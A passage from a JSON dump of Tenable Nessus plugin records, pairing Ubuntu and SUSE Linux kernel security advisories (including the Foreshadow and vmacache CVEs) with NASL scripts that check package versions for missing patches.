(CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttila discovered that the KVM\nimplementation in the Linux kernel did not properly check privilege\nlevels when emulating some instructions. An unprivileged attacker in a\nguest VM could use this to escalate privileges within the guest.\n(CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the\niSCSI target implementation of the Linux kernel. A remote attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of\nthe Linux kernel. A local attacker could use this to cause a denial of\nservice (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIRDA implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-6555).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3777-2.NASL", "href": "https://www.tenable.com/plugins/nessus/117873", "published": "2018-10-02T00:00:00", "title": "Ubuntu 16.04 LTS : linux-hwe, linux-gcp vulnerabilities (USN-3777-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3777-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117873);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2018-10853\", \"CVE-2018-14633\", \"CVE-2018-15572\", \"CVE-2018-15594\", \"CVE-2018-17182\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n script_xref(name:\"USN\", value:\"3777-2\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-hwe, linux-gcp vulnerabilities (USN-3777-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3777-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu\n16.04 LTS.\n\nJann Horn discovered that the vmacache subsystem did not properly\nhandle sequence number overflows, leading to a use-after-free\nvulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the\nLinux kernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A\nlocal attacker could use this to expose sensitive information.\n(CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution\nand prediction of return addresses via Return Stack Buffer (RSB) may\nallow unauthorized memory reads via sidechannel attacks. An attacker\ncould use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttila discovered that the KVM\nimplementation in the Linux kernel did not properly check privilege\nlevels when emulating some instructions. An unprivileged attacker in a\nguest VM could use this to escalate privileges within the guest.\n(CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the\niSCSI target implementation of the Linux kernel. A remote attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of\nthe Linux kernel. A local attacker could use this to cause a denial of\nservice (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIRDA implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-6555).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3777-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-10853\", \"CVE-2018-14633\", \"CVE-2018-15572\", \"CVE-2018-15594\", \"CVE-2018-17182\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3777-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1021-gcp\", pkgver:\"4.15.0-1021.22~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-36-generic\", pkgver:\"4.15.0-36.39~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-36-generic-lpae\", pkgver:\"4.15.0-36.39~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-36-lowlatency\", pkgver:\"4.15.0-36.39~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.15.0.1021.35\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-hwe-16.04\", pkgver:\"4.15.0.36.59\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae-hwe-16.04\", pkgver:\"4.15.0.36.59\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gke\", pkgver:\"4.15.0.1021.35\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency-hwe-16.04\", pkgver:\"4.15.0.36.59\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-oem\", pkgver:\"4.15.0.36.59\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-gcp / linux-image-4.15-generic / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-11-03T12:23:02", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 4.4.114-94_14 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-2416-1.NASL", "href": "https://www.tenable.com/plugins/nessus/112016", "published": "2018-08-20T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2416-1) (Foreshadow)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2416-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112016);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-18344\", \"CVE-2018-10853\", \"CVE-2018-3646\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2416-1) (Foreshadow)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 4.4.114-94_14 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn't properly validate\n the sigevent->sigev_notify field, which lead to\n out-of-bounds access in the show_timer function (called\n when /proc/$PID/timers is read). This allowed userspace\n applications to read arbitrary kernel memory (on a\n kernel built with CONFIG_POSIX_TIMERS and\n CONFIG_CHECKPOINT_RESTORE) (bsc#1103203). before 4.14.8\n\n - CVE-2018-10853: A flaw was found in kvm. In which\n certain instructions such as sgdt/sidt call\n segmented_write_std didn't propagate access correctly.\n As such, during userspace induced exception, the guest\n can incorrectly assume that the exception happened in\n the kernel and panic. (bsc#1097108).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097108\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1099306\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1103203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-18344/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10853/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3646/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182416-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f059202\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-1667=1 SUSE-SLE-SAP-12-SP2-2018-1668=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-1667=1 SUSE-SLE-SERVER-12-SP2-2018-1668=1\n\nSUSE Linux Enterprise Live Patching 12-SP3:zypper in -t patch\nSUSE-SLE-Live-Patching-12-SP3-2018-1672=1\nSUSE-SLE-Live-Patching-12-SP3-2018-1673=1\nSUSE-SLE-Live-Patching-12-SP3-2018-1674=1\nSUSE-SLE-Live-Patching-12-SP3-2018-1675=1\nSUSE-SLE-Live-Patching-12-SP3-2018-1676=1\nSUSE-SLE-Live-Patching-12-SP3-2018-1677=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_103-92_53-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_103-92_56-default\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_103-92_53-default-8-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_103-92_56-default-8-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:22:57", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 4.4.114-92_67 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-2391-1.NASL", "href": "https://www.tenable.com/plugins/nessus/111842", "published": "2018-08-17T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2391-1) (Foreshadow)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2391-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111842);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-18344\", \"CVE-2018-10853\", \"CVE-2018-3646\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2391-1) (Foreshadow)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 4.4.114-92_67 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn't properly validate\n the sigevent->sigev_notify field, which lead to\n out-of-bounds access in the show_timer function (called\n when /proc/$PID/timers is read). This allowed userspace\n applications to read arbitrary kernel memory (on a\n kernel built with CONFIG_POSIX_TIMERS and\n CONFIG_CHECKPOINT_RESTORE) (bsc#1103203). before 4.14.8\n\n - CVE-2018-10853: A flaw was found in kvm. In which\n certain instructions such as sgdt/sidt call\n segmented_write_std didn't propagate access correctly.\n As such, during userspace induced exception, the guest\n can incorrectly assume that the exception happened in\n the kernel and panic. (bsc#1097108).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097108\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1099306\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1103203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-18344/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10853/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3646/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182391-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a8f96945\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-1649=1 SUSE-SLE-SAP-12-SP2-2018-1650=1\nSUSE-SLE-SAP-12-SP2-2018-1652=1 SUSE-SLE-SAP-12-SP2-2018-1653=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-1649=1 SUSE-SLE-SERVER-12-SP2-2018-1650=1\nSUSE-SLE-SERVER-12-SP2-2018-1652=1 SUSE-SLE-SERVER-12-SP2-2018-1653=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_114-92_64-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_114-92_67-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_90-92_45-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_90-92_50-default\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_114-92_64-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_114-92_67-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_90-92_45-default-9-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_90-92_50-default-9-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:22:55", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 4.4.74-92_38 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-2387-1.NASL", "href": "https://www.tenable.com/plugins/nessus/111839", "published": "2018-08-17T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2387-1) (Foreshadow)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2387-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111839);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-11600\", \"CVE-2017-18344\", \"CVE-2018-10853\", \"CVE-2018-3646\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2387-1) (Foreshadow)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 4.4.74-92_38 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative 